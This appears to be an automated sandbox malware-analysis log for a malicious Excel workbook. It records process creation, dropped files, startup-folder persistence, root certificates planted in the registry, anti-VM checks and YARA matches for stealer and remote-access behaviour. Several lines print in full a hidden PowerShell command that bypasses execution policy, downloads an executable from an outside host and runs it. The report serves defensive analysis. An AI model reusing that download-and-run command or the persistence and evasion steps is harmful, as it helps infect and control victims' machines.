Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@8/14@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$DGTCkacbSz.xlsx Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe Mutant created: NULL
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR85B2.tmp Jump to behavior
Source: DGTCkacbSz.xlsx OLE indicator, Workbook stream: true
Source: 79E20000.0.dr OLE indicator, Workbook stream: true
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..................R...............R.................O........... Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: DGTCkacbSz.xlsx ReversingLabs: Detection: 39%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\tmp667.exe "C:\Users\user\AppData\Local\Temp\tmp667.exe"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\svcost.exe "C:\Users\user\AppData\Roaming\svcost.exe"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile; Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\tmp667.exe "C:\Users\user\AppData\Local\Temp\tmp667.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\svcost.exe "C:\Users\user\AppData\Roaming\svcost.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: credssp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: DGTCkacbSz.xlsx Initial sample: OLE zip file path = xl/media/image1.png
Source: 79E20000.0.dr Initial sample: OLE zip file path = xl/media/image1.png
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: tmp667.exe, 00000005.00000002.450858713.00000000037CB000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.451596079.00000000047A0000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.00000000024EB000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: tmp667.exe, 00000005.00000002.450858713.00000000037CB000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.451596079.00000000047A0000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.00000000024EB000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\tmp667.PDBO source: tmp667.exe, 00000005.00000002.446011562.0000000000408000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: :\Windows\mscorlib.pdbpdblib.pdb source: tmp667.exe, 00000005.00000002.446119875.000000000053F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: i0C:\Windows\mscorlib.pdbO source: tmp667.exe, 00000005.00000002.446011562.0000000000408000.00000004.00000010.00020000.00000000.sdmp

Data Obfuscation

Source: 5.2.tmp667.exe.370d5b0.5.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 5.2.tmp667.exe.370d5b0.5.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 5.2.tmp667.exe.370d5b0.5.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 5.2.tmp667.exe.370d5b0.5.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 5.2.tmp667.exe.370d5b0.5.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile; Jump to behavior
Source: Yara match File source: 5.2.tmp667.exe.48b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.451714574.00000000048B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.446711663.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: tmp667.exe PID: 3808, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svcost.exe PID: 3996, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Code function: 5_2_004242E0 push AC005BFAh; retf 5_2_004244BD
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Code function: 5_2_00424340 push AC005BFAh; retf 5_2_004244BD
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Code function: 5_2_00601247 pushfd ; retf 5_2_00601255
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Code function: 5_2_006D4B48 pushfd ; retf 5_2_006D4B49
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Code function: 5_2_00D58AB9 push 8C00440Dh; retf 5_2_00D58AC5
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Code function: 5_2_00D535F0 push ecx; retf 5_2_00D535F6
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Code function: 5_2_00D5363B push es; retf 5_2_00D53641
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Code function: 5_2_054035A6 push edi; retf 5_2_054035AC
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 8_2_008E42E0 push 64006FCFh; retf 8_2_008E43FD
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 8_2_00C2FA89 pushfd ; retf 8_2_00C2FA95
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 8_2_00C2554C push ss; ret 8_2_00C2554D
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 8_2_00C44B48 pushfd ; retf 8_2_00C44B49
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 8_2_043235F0 push ecx; retf 8_2_043235F6
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 8_2_0432363B push es; retf 8_2_04323641
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 8_2_04328AB9 push 8C009E0Dh; retf 8_2_04328AC5
Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 8_2_054035A6 push edi; retf 8_2_054035AC
Source: tmp667.exe.2.dr Static PE information: section name: .text entropy: 7.764858525500812
Source: svcost.exe.5.dr Static PE information: section name: .text entropy: 7.764858525500812

Persistence and Installation Behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe File created: C:\Users\user\AppData\Roaming\svcost.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\tmp667.exe Jump to dropped file

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\tmp667.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\svcost.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: tmp667.exe, 00000005.00000002.446711663.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Memory allocated: 1C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Memory allocated: 2690000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Memory allocated: 5F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Memory allocated: 5450000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Memory allocated: 15450000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\svcost.exe Memory allocated: 310000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\svcost.exe Memory allocated: 2310000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\svcost.exe Memory allocated: 940000 memory reserve | memory write watch
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svcost.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4761
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2327
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3748 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3752 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3772 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe TID: 3828 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe TID: 3832 Thread sleep count: 218 > 30
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe TID: 3840 Thread sleep count: 173 > 30
Source: C:\Users\user\AppData\Roaming\svcost.exe TID: 4016 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\svcost.exe TID: 4024 Thread sleep count: 198 > 30
Source: C:\Users\user\AppData\Roaming\svcost.exe TID: 4032 Thread sleep count: 100 > 30
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\
Source: svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
Source: svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Code function: 5_2_001CECA8 LdrInitializeThunk, 5_2_001CECA8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\svcost.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\tmp667.exe "C:\Users\user\AppData\Local\Temp\tmp667.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\svcost.exe "C:\Users\user\AppData\Roaming\svcost.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Queries volume information: C:\Users\user\AppData\Local\Temp\tmp667.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\svcost.exe Queries volume information: C:\Users\user\AppData\Roaming\svcost.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.446711663.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.474407108.000000000256D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: tmp667.exe PID: 3808, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svcost.exe PID: 3996, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.446711663.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.474407108.000000000256D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: tmp667.exe PID: 3808, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svcost.exe PID: 3996, type: MEMORYSTR